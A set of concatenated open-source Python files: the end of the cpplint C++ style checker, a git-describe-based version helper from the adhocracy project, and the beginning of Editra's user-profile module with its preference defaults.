if match and match.group(1) != '__VA_ARGS__':
function_name = re.search(r'\b((?:string)?printf)\s*\(',
line, re.I).group(1)
error(filename, linenum, 'runtime/printf', 4,
'Potential format string bug. Do %s("%%s", %s) instead.'
% (function_name, match.group(1)))
# Check for potential memset bugs like memset(buf, sizeof(buf), 0).
match = Search(r'memset\s*\(([^,]*),\s*([^,]*),\s*0\s*\)', line)
if match and not Match(r"^(''|-?[0-9]+|0x[0-9A-Fa-f]+)$", match.group(2)):
error(filename, linenum, 'runtime/memset', 4,
'Did you mean "memset(%s, 0, %s)"?'
% (match.group(1), match.group(2)))
if Search(r'\busing namespace\b', line):
error(filename, linenum, 'build/namespaces', 5,
'Do not use namespace using-directives. '
'Use using-declarations instead.')
# Detect variable-length arrays.
match = Match(r'\s*(.+::)?(\w+) [a-z]\w*\[(.+)];', line)
if (match and match.group(2) != 'return' and match.group(2) != 'delete' and
match.group(3).find(']') == -1):
# Split the size using space and arithmetic operators as delimiters.
# If any of the resulting tokens are not compile time constants then
# report the error.
tokens = re.split(r'\s|\+|\-|\*|\/|<<|>>', match.group(3))
is_const = True
skip_next = False
for tok in tokens:
if skip_next:
skip_next = False
continue
if Search(r'sizeof\(.+\)', tok): continue
if Search(r'arraysize\(\w+\)', tok): continue
tok = tok.lstrip('(')
tok = tok.rstrip(')')
if not tok: continue
if Match(r'\d+', tok): continue
if Match(r'0[xX][0-9a-fA-F]+', tok): continue
if Match(r'k[A-Z0-9]\w*', tok): continue
if Match(r'(.+::)?k[A-Z0-9]\w*', tok): continue
if Match(r'(.+::)?[A-Z][A-Z0-9_]*', tok): continue
# A catch all for tricky sizeof cases, including 'sizeof expression',
# 'sizeof(*type)', 'sizeof(const type)', 'sizeof(struct StructName)'
# requires skipping the next token because we split on ' ' and '*'.
if tok.startswith('sizeof'):
skip_next = True
continue
is_const = False
break
if not is_const:
error(filename, linenum, 'runtime/arrays', 1,
'Do not use variable-length arrays. Use an appropriately named '
"('k' followed by CamelCase) compile-time constant for the size.")
# If DISALLOW_EVIL_CONSTRUCTORS, DISALLOW_COPY_AND_ASSIGN, or
# DISALLOW_IMPLICIT_CONSTRUCTORS is present, then it should be the last thing
# in the class declaration.
match = Match(
(r'\s*'
r'(DISALLOW_(EVIL_CONSTRUCTORS|COPY_AND_ASSIGN|IMPLICIT_CONSTRUCTORS))'
r'\(.*\);$'),
line)
if match and linenum + 1 < clean_lines.NumLines():
next_line = clean_lines.elided[linenum + 1]
# We allow some, but not all, declarations of variables to be present
# in the statement that defines the class. The [\w\*,\s]* fragment of
# the regular expression below allows users to declare instances of
# the class or pointers to instances, but not less common types such
# as function pointers or arrays. It's a tradeoff between allowing
# reasonable code and avoiding trying to parse more C++ using regexps.
if not Search(r'^\s*}[\w\*,\s]*;', next_line):
error(filename, linenum, 'readability/constructors', 3,
match.group(1) + ' should be the last thing in the class')
# Check for use of unnamed namespaces in header files. Registration
# macros are typically OK, so we allow use of "namespace {" on lines
# that end with backslashes.
if (file_extension == 'h'
and Search(r'\bnamespace\s*{', line)
and line[-1] != '\\'):
error(filename, linenum, 'build/namespaces', 4,
'Do not use unnamed namespaces in header files. See '
'http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml#Namespaces'
' for more information.')
def CheckCStyleCast(filename, linenum, line, raw_line, cast_type, pattern,
error):
"""Checks for a C-style cast by looking for the pattern.
This also handles sizeof(type) warnings, due to similarity of content.
Args:
filename: The name of the current file.
linenum: The number of the line to check.
line: The line of code to check.
raw_line: The raw line of code to check, with comments.
cast_type: The string for the C++ cast to recommend. This is either
reinterpret_cast, static_cast, or const_cast, depending.
pattern: The regular expression used to find C-style casts.
error: The function to call with any errors found.
Returns:
True if an error was emitted.
False otherwise.
"""
match = Search(pattern, line)
if not match:
return False
# e.g., sizeof(int)
sizeof_match = Match(r'.*sizeof\s*$', line[0:match.start(1) - 1])
if sizeof_match:
error(filename, linenum, 'runtime/sizeof', 1,
'Using sizeof(type). Use sizeof(varname) instead if possible')
return True
# operator++(int) and operator--(int)
if (line[0:match.start(1) - 1].endswith(' operator++') or
line[0:match.start(1) - 1].endswith(' operator--')):
return False
remainder = line[match.end(0):]
# The close paren is for function pointers as arguments to a function.
# eg, void foo(void (*bar)(int));
# The semicolon check is a more basic function check; also possibly a
# function pointer typedef.
# eg, void foo(int); or void foo(int) const;
# The equals check is for function pointer assignment.
# eg, void *(*foo)(int) = ...
# The > is for MockCallback<...> ...
#
# Right now, this will only catch cases where there's a single argument, and
# it's unnamed. It should probably be expanded to check for multiple
# arguments with some unnamed.
function_match = Match(r'\s*(\)|=|(const)?\s*(;|\{|throw\(\)|>))', remainder)
if function_match:
if (not function_match.group(3) or
function_match.group(3) == ';' or
('MockCallback<' not in raw_line and
'/*' not in raw_line)):
error(filename, linenum, 'readability/function', 3,
'All parameters should be named in a function')
return True
# At this point, all that should be left is actual casts.
error(filename, linenum, 'readability/casting', 4,
'Using C-style cast. Use %s<%s>(...) instead' %
(cast_type, match.group(1)))
return True
_HEADERS_CONTAINING_TEMPLATES = (
('<deque>', ('deque',)),
('<functional>', ('unary_function', 'binary_function',
'plus', 'minus', 'multiplies', 'divides', 'modulus',
'negate',
'equal_to', 'not_equal_to', 'greater', 'less',
'greater_equal', 'less_equal',
'logical_and', 'logical_or', 'logical_not',
'unary_negate', 'not1', 'binary_negate', 'not2',
'bind1st', 'bind2nd',
'pointer_to_unary_function',
'pointer_to_binary_function',
'ptr_fun',
'mem_fun_t', 'mem_fun', 'mem_fun1_t', 'mem_fun1_ref_t',
'mem_fun_ref_t',
'const_mem_fun_t', 'const_mem_fun1_t',
'const_mem_fun_ref_t', 'const_mem_fun1_ref_t',
'mem_fun_ref',
)),
('<limits>', ('numeric_limits',)),
('<list>', ('list',)),
('<map>', ('map', 'multimap',)),
('<memory>', ('allocator',)),
('<queue>', ('queue', 'priority_queue',)),
('<set>', ('set', 'multiset',)),
('<stack>', ('stack',)),
('<string>', ('char_traits', 'basic_string',)),
('<utility>', ('pair',)),
('<vector>', ('vector',)),
# gcc extensions.
# Note: std::hash is their hash, ::hash is our hash
('<hash_map>', ('hash_map', 'hash_multimap',)),
('<hash_set>', ('hash_set', 'hash_multiset',)),
('<slist>', ('slist',)),
)
_RE_PATTERN_STRING = re.compile(r'\bstring\b')
_re_pattern_algorithm_header = []
for _template in ('copy', 'max', 'min', 'min_element', 'sort', 'swap',
'transform'):
# Match max<type>(..., ...), max(..., ...), but not foo->max, foo.max or
# type::max().
_re_pattern_algorithm_header.append(
(re.compile(r'[^>.]\b' + _template + r'(<.*?>)?\([^\)]'),
_template,
'<algorithm>'))
_re_pattern_templates = []
for _header, _templates in _HEADERS_CONTAINING_TEMPLATES:
for _template in _templates:
_re_pattern_templates.append(
(re.compile(r'(\<|\b)' + _template + r'\s*\<'),
_template + '<>',
_header))
def FilesBelongToSameModule(filename_cc, filename_h):
"""Check if these two filenames belong to the same module.
The concept of a 'module' here is as follows:
foo.h, foo-inl.h, foo.cc, foo_test.cc and foo_unittest.cc belong to the
same 'module' if they are in the same directory.
some/path/public/xyzzy and some/path/internal/xyzzy are also considered
to belong to the same module here.
If the filename_cc contains a longer path than the filename_h, for example,
'/absolute/path/to/base/sysinfo.cc', and this file would include
'base/sysinfo.h', this function also produces the prefix needed to open the
header. This is used by the caller of this function to more robustly open the
header file. We don't have access to the real include paths in this context,
so we need this guesswork here.
Known bugs: tools/base/bar.cc and base/bar.h belong to the same module
according to this implementation. Because of this, this function gives
some false positives. This should be sufficiently rare in practice.
Args:
filename_cc: is the path for the .cc file
filename_h: is the path for the header file
Returns:
Tuple with a bool and a string:
bool: True if filename_cc and filename_h belong to the same module.
string: the additional prefix needed to open the header file.
"""
if not filename_cc.endswith('.cc'):
return (False, '')
filename_cc = filename_cc[:-len('.cc')]
if filename_cc.endswith('_unittest'):
filename_cc = filename_cc[:-len('_unittest')]
elif filename_cc.endswith('_test'):
filename_cc = filename_cc[:-len('_test')]
filename_cc = filename_cc.replace('/public/', '/')
filename_cc = filename_cc.replace('/internal/', '/')
if not filename_h.endswith('.h'):
return (False, '')
filename_h = filename_h[:-len('.h')]
if filename_h.endswith('-inl'):
filename_h = filename_h[:-len('-inl')]
filename_h = filename_h.replace('/public/', '/')
filename_h = filename_h.replace('/internal/', '/')
files_belong_to_same_module = filename_cc.endswith(filename_h)
common_path = ''
if files_belong_to_same_module:
common_path = filename_cc[:-len(filename_h)]
return files_belong_to_same_module, common_path
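The module-matching rules above can be mirrored in a standalone sketch (a simplified re-implementation for illustration, not the function cpplint actually uses):

```python
def files_belong_to_same_module(filename_cc, filename_h):
    # Returns (same_module, common_path_prefix), mirroring the rules above:
    # strip extensions and test suffixes, fold public/internal directories,
    # then check whether the .cc path ends with the header path.
    if not filename_cc.endswith('.cc') or not filename_h.endswith('.h'):
        return (False, '')
    filename_cc = filename_cc[:-len('.cc')]
    for suffix in ('_unittest', '_test'):
        if filename_cc.endswith(suffix):
            filename_cc = filename_cc[:-len(suffix)]
            break
    filename_h = filename_h[:-len('.h')]
    if filename_h.endswith('-inl'):
        filename_h = filename_h[:-len('-inl')]
    for part in ('/public/', '/internal/'):
        filename_cc = filename_cc.replace(part, '/')
        filename_h = filename_h.replace(part, '/')
    same = filename_cc.endswith(filename_h)
    prefix = filename_cc[:-len(filename_h)] if same else ''
    return (same, prefix)
```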
def UpdateIncludeState(filename, include_state, io=codecs):
"""Fill up the include_state with new includes found from the file.
Args:
filename: the name of the header to read.
include_state: an _IncludeState instance in which the headers are inserted.
io: The io factory to use to read the file. Provided for testability.
Returns:
True if a header was successfully added. False otherwise.
"""
headerfile = None
try:
headerfile = io.open(filename, 'r', 'utf8', 'replace')
except IOError:
return False
linenum = 0
for line in headerfile:
linenum += 1
clean_line = CleanseComments(line)
match = _RE_PATTERN_INCLUDE.search(clean_line)
if match:
include = match.group(2)
# The value formatting is cute, but not really used right now.
# What matters here is that the key is in include_state.
include_state.setdefault(include, '%s:%d' % (filename, linenum))
return True
def CheckForIncludeWhatYouUse(filename, clean_lines, include_state, error,
io=codecs):
"""Reports for missing stl includes.
This function will output warnings to make sure you are including the headers
necessary for the stl containers and functions that you use. We only give one
reason to include a header. For example, if you use both equal_to<> and
less<> in a .h file, only one of these (whichever appears later in the file)
will be reported as a reason to include <functional>.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
include_state: An _IncludeState instance.
error: The function to call with any errors found.
io: The IO factory to use to read the header file. Provided for unittest
injection.
"""
required = {} # A map of header name to linenumber and the template entity.
# Example of required: { '<functional>': (1219, 'less<>') }
for linenum in xrange(clean_lines.NumLines()):
line = clean_lines.elided[linenum]
if not line or line[0] == '#':
continue
# String is special -- it is a non-templatized type in STL.
matched = _RE_PATTERN_STRING.search(line)
if matched:
# Don't warn about strings in non-STL namespaces:
# (We check only the first match per line; good enough.)
prefix = line[:matched.start()]
if prefix.endswith('std::') or not prefix.endswith('::'):
required['<string>'] = (linenum, 'string')
for pattern, template, header in _re_pattern_algorithm_header:
if pattern.search(line):
required[header] = (linenum, template)
# The following function is just a speed up, no semantics are changed.
if '<' not in line: # Reduces the cpu time usage by skipping lines.
continue
for pattern, template, header in _re_pattern_templates:
if pattern.search(line):
required[header] = (linenum, template)
# The policy is that if you #include something in foo.h you don't need to
# include it again in foo.cc. Here, we will look at possible includes.
# Let's copy the include_state so it is only messed up within this function.
include_state = include_state.copy()
# Did we find the header for this file (if any) and successfully load it?
header_found = False
# Use the absolute path so that matching works properly.
abs_filename = FileInfo(filename).FullName()
# For Emacs's flymake.
# If cpplint is invoked from Emacs's flymake, a temporary file is generated
# by flymake and that file name might end with '_flymake.cc'. In that case,
# restore original file name here so that the corresponding header file can be
# found.
# e.g. If the file name is 'foo_flymake.cc', we should search for 'foo.h'
# instead of 'foo_flymake.h'
abs_filename = re.sub(r'_flymake\.cc$', '.cc', abs_filename)
# include_state is modified during iteration, so we iterate over a copy of
# the keys.
header_keys = include_state.keys()
for header in header_keys:
(same_module, common_path) = FilesBelongToSameModule(abs_filename, header)
fullpath = common_path + header
if same_module and UpdateIncludeState(fullpath, include_state, io):
header_found = True
# If we can't find the header file for a .cc, assume it's because we don't
# know where to look. In that case we'll give up as we're not sure they
# didn't include it in the .h file.
# TODO(unknown): Do a better job of finding .h files so we are confident that
# not having the .h file means there isn't one.
if filename.endswith('.cc') and not header_found:
return
# All the lines have been processed, report the errors found.
for required_header_unstripped in required:
template = required[required_header_unstripped][1]
if required_header_unstripped.strip('<>"') not in include_state:
error(filename, required[required_header_unstripped][0],
'build/include_what_you_use', 4,
'Add #include ' + required_header_unstripped + ' for ' + template)
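The reporting loop above keys `required` by the include as literally written (e.g. `<string>` or `"foo.h"`) but tests membership in `include_state` with the angle brackets/quotes stripped. A minimal standalone sketch of that check — the data values here are made up for illustration:

```python
# required maps the include spelling as written -> (line number, symbol name);
# include_state holds already-included headers in stripped form.
required = {'<string>': (10, 'string'), '"foo/bar.h"': (25, 'Bar')}
include_state = {'string': 12}

# An include is reported as missing when its stripped form was never seen.
missing = [inc for inc in required if inc.strip('<>"') not in include_state]
```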
_RE_PATTERN_EXPLICIT_MAKEPAIR = re.compile(r'\bmake_pair\s*<')
def CheckMakePairUsesDeduction(filename, clean_lines, linenum, error):
"""Check that make_pair's template arguments are deduced.
G++ 4.6 in C++0x mode fails badly if make_pair's template arguments are
specified explicitly, and such use isn't intended in any case.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
raw = clean_lines.raw_lines
line = raw[linenum]
match = _RE_PATTERN_EXPLICIT_MAKEPAIR.search(line)
if match:
error(filename, linenum, 'build/explicit_make_pair',
4, # 4 = high confidence
'For C++11-compatibility, omit template arguments from make_pair'
' OR use pair directly OR if appropriate, construct a pair directly')
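The regex above fires only when `make_pair` is followed by an explicit template argument list; a quick standalone check using the same pattern:

```python
import re

# The same pattern cpplint compiles above: "make_pair" followed by "<".
_RE_PATTERN_EXPLICIT_MAKEPAIR = re.compile(r'\bmake_pair\s*<')

def uses_explicit_make_pair(line):
    """True when make_pair is called with explicit template arguments."""
    return bool(_RE_PATTERN_EXPLICIT_MAKEPAIR.search(line))
```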
def ProcessLine(filename, file_extension, clean_lines, line,
include_state, function_state, nesting_state, error,
extra_check_functions=[]):
"""Processes a single line in the file.
Args:
filename: Filename of the file that is being processed.
file_extension: The extension (dot not included) of the file.
clean_lines: An array of strings, each representing a line of the file,
with comments stripped.
line: Number of line being processed.
include_state: An _IncludeState instance in which the headers are inserted.
function_state: A _FunctionState instance which counts function lines, etc.
nesting_state: A _NestingState instance which maintains information about
the current stack of nested blocks being parsed.
error: A callable to which errors are reported, which takes 5 arguments:
filename, line number, category, confidence level, and message
extra_check_functions: An array of additional check functions that will be
run on each source line. Each function takes 4
arguments: filename, clean_lines, line, error
"""
raw_lines = clean_lines.raw_lines
ParseNolintSuppressions(filename, raw_lines[line], line, error)
nesting_state.Update(filename, clean_lines, line, error)
if nesting_state.stack and nesting_state.stack[-1].inline_asm != _NO_ASM:
return
CheckForFunctionLengths(filename, clean_lines, line, function_state, error)
CheckForMultilineCommentsAndStrings(filename, clean_lines, line, error)
CheckStyle(filename, clean_lines, line, file_extension, nesting_state, error)
CheckLanguage(filename, clean_lines, line, file_extension, include_state,
error)
CheckForNonStandardConstructs(filename, clean_lines, line,
nesting_state, error)
CheckPosixThreading(filename, clean_lines, line, error)
CheckInvalidIncrement(filename, clean_lines, line, error)
CheckMakePairUsesDeduction(filename, clean_lines, line, error)
for check_fn in extra_check_functions:
check_fn(filename, clean_lines, line, error)
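Each entry in `extra_check_functions` is called with `(filename, clean_lines, linenum, error)`. A hypothetical plugin check sketched below — `_FakeCleanLines` is a stand-in for cpplint's `CleansedLines`, and the error callback takes the same five arguments used by the calls elsewhere in this file:

```python
class _FakeCleanLines(object):
    """Stand-in for cpplint's CleansedLines (hypothetical, for illustration)."""
    def __init__(self, lines):
        self.raw_lines = lines

def check_no_tabs(filename, clean_lines, linenum, error):
    # Matches the extra_check_functions signature described above.
    if '\t' in clean_lines.raw_lines[linenum]:
        error(filename, linenum, 'whitespace/tab', 1, 'Tab found; use spaces')

# Collect (category, confidence) pairs instead of printing.
found = []
check_no_tabs('foo.cc', _FakeCleanLines(['int\tx;']), 0,
              lambda f, n, cat, lvl, msg: found.append((cat, lvl)))
```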
def ProcessFileData(filename, file_extension, lines, error,
extra_check_functions=[]):
"""Performs lint checks and reports any errors to the given error function.
Args:
filename: Filename of the file that is being processed.
file_extension: The extension (dot not included) of the file.
lines: An array of strings, each representing a line of the file, with the
last element being empty if the file is terminated with a newline.
error: A callable to which errors are reported, which takes 5 arguments:
filename, line number, category, confidence level, and message
extra_check_functions: An array of additional check functions that will be
run on each source line. Each function takes 4
arguments: filename, clean_lines, line, error
"""
lines = (['// marker so line numbers and indices both start at 1'] + lines +
['// marker so line numbers end in a known way'])
include_state = _IncludeState()
function_state = _FunctionState()
nesting_state = _NestingState()
ResetNolintSuppressions()
CheckForCopyright(filename, lines, error)
if file_extension == 'h':
CheckForHeaderGuard(filename, lines, error)
RemoveMultiLineComments(filename, lines, error)
clean_lines = CleansedLines(lines)
for line in xrange(clean_lines.NumLines()):
ProcessLine(filename, file_extension, clean_lines, line,
include_state, function_state, nesting_state, error,
extra_check_functions)
nesting_state.CheckClassFinished(filename, error)
CheckForIncludeWhatYouUse(filename, clean_lines, include_state, error)
# We check here rather than inside ProcessLine so that we see raw
# lines rather than "cleaned" lines.
CheckForUnicodeReplacementCharacters(filename, lines, error)
CheckForNewlineAtEOF(filename, lines, error)
def ProcessFile(filename, vlevel, extra_check_functions=[]):
"""Does google-lint on a single file.
Args:
filename: The name of the file to parse.
vlevel: The level of errors to report. Every error of confidence
>= verbose_level will be reported. 0 is a good default.
extra_check_functions: An array of additional check functions that will be
run on each source line. Each function takes 4
arguments: filename, clean_lines, line, error
"""
_SetVerboseLevel(vlevel)
try:
# Support the UNIX convention of using "-" for stdin. Note that
# we are not opening the file with universal newline support
# (which codecs doesn't support anyway), so the resulting lines do
# contain trailing '\r' characters if we are reading a file that
# has CRLF endings.
# If after the split a trailing '\r' is present, it is removed
# below. If it is not expected to be present (i.e. os.linesep !=
# '\r\n' as in Windows), a warning is issued below if this file
# is processed.
if filename == '-':
lines = codecs.StreamReaderWriter(sys.stdin,
codecs.getreader('utf8'),
codecs.getwriter('utf8'),
'replace').read().split('\n')
else:
lines = codecs.open(filename, 'r', 'utf8', 'replace').read().split('\n')
carriage_return_found = False
# Remove trailing '\r'.
for linenum in range(len(lines)):
if lines[linenum].endswith('\r'):
lines[linenum] = lines[linenum].rstrip('\r')
carriage_return_found = True
except IOError:
sys.stderr.write(
"Skipping input '%s': Can't open for reading\n" % filename)
return
# Note, if no dot is found, this will give the entire filename as the ext.
file_extension = filename[filename.rfind('.') + 1:]
# When reading from stdin, the extension is unknown, so no cpplint tests
# should rely on the extension.
if (filename != '-' and file_extension != 'cc' and file_extension != 'h'
and file_extension != 'cpp'):
sys.stderr.write('Ignoring %s; not a .cc or .h file\n' % filename)
else:
ProcessFileData(filename, file_extension, lines, Error,
extra_check_functions)
if carriage_return_found and os.linesep != '\r\n':
# Use 0 for linenum since outputting only one error for potentially
# several lines.
Error(filename, 0, 'whitespace/newline', 1,
'One or more unexpected \\r (^M) found; '
'better to use only a \\n')
sys.stderr.write('Done processing %s\n' % filename)
def PrintUsage(message):
"""Prints a brief usage string and exits, optionally with an error message.
Args:
message: The optional error message.
"""
sys.stderr.write(_USAGE)
if message:
sys.exit('\nFATAL ERROR: ' + message)
else:
sys.exit(1)
def PrintCategories():
"""Prints a list of all the error-categories used by error messages.
These are the categories used to filter messages via --filter.
"""
sys.stderr.write(''.join(' %s\n' % cat for cat in _ERROR_CATEGORIES))
sys.exit(0)
def ParseArguments(args):
"""Parses the command line arguments.
This may set the output format and verbosity level as side-effects.
Args:
args: The command line arguments.
Returns:
The list of filenames to lint.
"""
try:
(opts, filenames) = getopt.getopt(args, '', ['help', 'output=', 'verbose=',
'counting=',
'filter=',
'root='])
except getopt.GetoptError:
PrintUsage('Invalid arguments.')
verbosity = _VerboseLevel()
output_format = _OutputFormat()
filters = ''
counting_style = ''
for (opt, val) in opts:
if opt == '--help':
PrintUsage(None)
elif opt == '--output':
if not val in ('emacs', 'vs7', 'eclipse'):
PrintUsage('The only allowed output formats are emacs, vs7 and eclipse.')
output_format = val
elif opt == '--verbose':
verbosity = int(val)
elif opt == '--filter':
filters = val
if not filters:
PrintCategories()
elif opt == '--counting':
if val not in ('total', 'toplevel', 'detailed'):
PrintUsage('Valid counting options are total, toplevel, and detailed')
counting_style = val
elif opt == '--root':
global _root
_root = val
if not filenames:
PrintUsage('No files were specified.')
_SetOutputFormat(output_format)
_SetVerboseLevel(verbosity)
_SetFilters(filters)
_SetCountingStyle(counting_style)
return filenames
def main():
filenames = ParseArguments(sys.argv[1:])
# Change stderr to write with replacement characters so we don't die
# if we try to print something containing non-ASCII characters.
sys.stderr = codecs.StreamReaderWriter(sys.stderr,
codecs.getreader('utf8'),
codecs.getwriter('utf8'),
'replace')
_cpplint_state.ResetErrorCounts()
for filename in filenames:
ProcessFile(filename, _cpplint_state.verbose_level)
_cpplint_state.PrintErrorCounts()
sys.exit(_cpplint_state.error_count > 0)
if __name__ == '__main__':
main()
| gpl-3.0 |
xs2maverick/adhocracy3.mercator | src/adhocracy_spd/version.py | 26 | 3208 | # -*- coding: utf-8 -*-
# Author: Douglas Creager <dcreager@dcreager.net>
# This file is placed into the public domain.
# Calculates the current version number. If possible, this is the
# output of “git describe”, modified to conform to the versioning
# scheme that setuptools uses. If “git describe” returns an error
# (most likely because we're in an unpacked copy of a release tarball,
# rather than in a git working copy), then we fall back on reading the
# contents of the RELEASE-VERSION file.
#
# To use this script, simply import it in your setup.py file, and use the
# results of get_git_version() as your package version:
#
# from version import *
#
# setup(
# version=get_git_version(),
# .
# .
# .
# )
#
# This will automatically update the RELEASE-VERSION file, if
# necessary. Note that the RELEASE-VERSION file should *not* be
# checked into git; please add it to your top-level .gitignore file.
#
# You'll probably want to distribute the RELEASE-VERSION file in your
# sdist tarballs; to do this, just create a MANIFEST.in file that
# contains the following line:
#
# include RELEASE-VERSION
"""Provide helper functions for getting a version number."""
from subprocess import Popen, PIPE
def call_git_describe(abbrev=4):
"""Call git describe to get the current version number."""
try:
p = Popen(['git', 'describe', '--abbrev=%d' % abbrev],
stdout=PIPE, stderr=PIPE)
p.stderr.close()
line = p.stdout.readlines()[0]
return line.decode('utf-8').strip()
except:
return None
def read_release_version():
""" Read current version number from RELEASE-VERSION."""
try:
f = open('RELEASE-VERSION', 'r')
try:
version = f.readlines()[0]
return version.strip()
finally:
f.close()
except:
return None
def write_release_version(version):
"""Write version number to RELEASE-VERSION."""
f = open('RELEASE-VERSION', 'w')
f.write('%s\n' % version)
f.close()
def get_git_version(abbrev=4):
"""Try to get version from git and fallback to file. """
# Read in the version that's currently in RELEASE-VERSION.
release_version = read_release_version()
# First try to get the current version using “git describe”.
version = call_git_describe(abbrev)
# Adapt to PEP 386 compatible versioning scheme
if (version is not None) and ('-' in version):
parts = version.split('-')
parts[-2] = 'post' + parts[-2]
version = '.'.join(parts[:-1])
# If that doesn't work, fall back on the value that's in
# RELEASE-VERSION.
if version is None:
version = release_version
# If we still don't have anything, that's an error.
if version is None:
raise ValueError('Cannot find the version number!')
# If the current version is different from what's in the
# RELEASE-VERSION file, update the file to be current.
if version != release_version:
write_release_version(version)
# Finally, return the current version.
return version
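The PEP 386 adaptation inside `get_git_version` turns a `git describe` string such as `0.3-5-gabc123` into `0.3.post5`, while clean release tags pass through untouched. The transformation sketched standalone:

```python
def pep386ify(version):
    # Same transformation as in get_git_version above:
    # '0.3-5-gabc123' -> '0.3.post5'; plain tags and None are unchanged.
    if (version is not None) and ('-' in version):
        parts = version.split('-')
        parts[-2] = 'post' + parts[-2]
        version = '.'.join(parts[:-1])
    return version
```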
__all__ = ('get_git_version')
if __name__ == '__main__':
print(get_git_version())
| agpl-3.0 |
163gal/Time-Line | libs/wx/tools/Editra/src/profiler.py | 2 | 18345 | ###############################################################################
# Name: profiler.py #
# Purpose: Editra's user profile services #
# Author: Cody Precord <cprecord@editra.org> #
# Copyright: (c) 2008 Cody Precord <staff@editra.org> #
# License: wxWindows License #
###############################################################################
"""
This module provides the profile object and support functions for loading and
saving user preferences between sessions. The preferences are saved on disk as
a cPickle; because of this, objects that cannot be resolved in the namespace
of this module prior to starting the mainloop must not be put in the Profile,
as they will cause errors on load. This means that only builtin python types should
be used and that a translation from that type to the required type should
happen during run time.
@summary: Editra's user profile management
"""
__author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: profiler.py 63791 2010-03-30 02:57:15Z CJP $"
__revision__ = "$Revision: 63791 $"
#--------------------------------------------------------------------------#
# Imports
import os
import sys
import cPickle
import wx
# Editra Imports
from ed_glob import CONFIG, PROG_NAME, VERSION, PRINT_BLACK_WHITE, EOL_MODE_LF
import util
import dev_tool
import ed_msg
_ = wx.GetTranslation
#--------------------------------------------------------------------------#
# Globals
_DEFAULTS = {
'ALPHA' : 255, # Transparency level (0-255)
'AALIASING' : False, # Use Anti-Aliasing if available
'APPSPLASH' : True, # Show splash at startup
'AUTOBACKUP' : False, # Automatically backup files
'AUTOBACKUP_PATH' : '', # Backup path
'AUTO_COMP' : True, # Use Auto-comp if available
'AUTO_COMP_EX' : False, # Use extended autocompletion
'AUTO_INDENT': True, # Use Auto Indent
'AUTO_TRIM_WS' : False, # Trim whitespace on save
'AUTO_RELOAD' : False, # Automatically reload files?
'BRACKETHL' : True, # Use bracket highlighting
'BSUNINDENT' : True, # Backspace Unindents
'CTRLBAR' : dict(), # ControlBar layouts
'CHECKMOD' : True, # Auto check file for file mod
'CHECKUPDATE': True, # Check for updates on start
'CODE_FOLD' : True, # Use code folding
'DEFAULT_LEX': 'Plain Text', # Default lexer for new documents
'DEFAULT' : False, # No longer used I believe
'DEFAULT_VIEW' : 'Automatic', # Default Perspective
'EDGE' : 80, # Edge guide column
'ENCODING' : None, # Preferred text encoding
'EOL_MODE' : EOL_MODE_LF, # EOL mode 1 == LF, 2 == CRLF
'FHIST' : list(), # List of history files
'FHIST_LVL' : 9, # Filehistory length (9 is max)
'FFILTER' : 0, # Last file filter used
'GUIDES' : False, # Use Indentation guides
'HLCARETLINE': False, # Highlight Caret Line
'ICONS' : 'Tango', # Icon Theme
'ICON_SZ' : (24, 24), # Toolbar Icon Size
'INDENTWIDTH': 4, # Default indent width
'ISBINARY' : False, # Is this instance a binary
'KEY_PROFILE': None, # Keybinding profile
'LANG' : 'Default', # UI language
'LASTCHECK' : 0, # Last time update check was done
#'LEXERMENU' : [lang_name,] # Created on an as needed basis
'MAXIMIZED' : False, # Was window maximized on exit
'MODE' : 'CODE', # Overall editor mode
'MYPROFILE' : 'default.ppb', # Path to profile file
'OPEN_NW' : False, # Open files in new windows
'PRINT_MODE' : PRINT_BLACK_WHITE,# Printer rendering mode
'PROXY_SETTINGS' : dict(), # Proxy Server Settings
'REPORTER' : True, # Error Reporter is Active
'SAVE_POS' : True, # Remember caret positions
'SAVE_SESSION' : False, # Load previous session on startup
'SEARCH_LOC' : list(), # Recent Search Locations
'SEARCH_FILTER' : '', # Last used search filter
'SESSION_KEY' : '', # Ipc Session Server Key
'SET_WPOS' : True, # Remember window position
'SET_WSIZE' : True, # Remember mainwindow size on exit
'SHOW_EDGE' : True, # Show Edge Guide
'SHOW_EOL' : False, # Show EOL markers
'SHOW_LN' : True, # Show Line Numbers
'SHOW_WS' : False, # Show whitespace markers
'SPELLCHECK' : dict(auto=False,
dict='en_US',
epath=None), # Spell checking preferences
'STATBAR' : True, # Show Status Bar
'SYNTAX' : True, # Use Syntax Highlighting
'SYNTHEME' : 'Default', # Syntax Highlight color scheme
'TABICONS' : True, # Show Tab Icons
'TABWIDTH' : 8, # Tab width
'THEME' : 'DEFAULT', # For future use
'TOOLBAR' : True, # Show Toolbar
'USETABS' : False, # Use tabs instead of spaces
'USE_PROXY' : False, # Use Proxy server settings?
'VI_EMU' : False, # Use Vi emulation mode
'VI_NORMAL_DEFAULT' : False, # Use Normal mode by default
'WARN_EOL' : True, # Warn about mixed eol characters
'WRAP' : False, # Use Wordwrap
'WSIZE' : (700, 450) # Mainwindow size
#FONT1 created at runtime by ed_styles as primary font
#FONT2 created at runtime by ed_styles as secondary font
#FONT3 Standard Font by UI, added to profile when customized
}
#--------------------------------------------------------------------------#
class Profile(dict):
"""Class for managing profile data. All data is stored as builtin
python objects (i.e. str, tuple, list, etc.); however, on a request
for data the object can be transformed into a requested type where
applicable. The profile saves itself to disk using the cPickle module
to preserve data types and allow for easy loading.
"""
_instance = None
_created = False
def __init__(self):
"""Initialize the profile"""
if not self._created:
dict.__init__(self)
else:
pass
def __new__(cls, *args, **kargs):
"""Maintain only a single instance of this object
@return: instance of this class
"""
if cls._instance is None:
cls._instance = dict.__new__(cls, *args, **kargs)
return cls._instance
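The `__new__` override above is a dict-backed singleton: every construction returns the same instance, so profile state is shared process-wide. A compact standalone equivalent:

```python
class Singleton(dict):
    """Minimal sketch of the Profile singleton pattern above."""
    _instance = None

    def __new__(cls, *args, **kargs):
        # Create the backing dict only once; hand back the cached
        # instance on every later construction.
        if cls._instance is None:
            cls._instance = dict.__new__(cls, *args, **kargs)
        return cls._instance

a = Singleton()
b = Singleton()
a['SYNTAX'] = True  # state set through one name is visible through the other
```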
#---- End Private Members ----#
#---- Begin Public Members ----#
def DeleteItem(self, item):
"""Removes an entry from the profile
@param item: items name
@type item: string
"""
if item in self:
del self[item]
else:
pass
def Get(self, index, fmt=None, default=None):
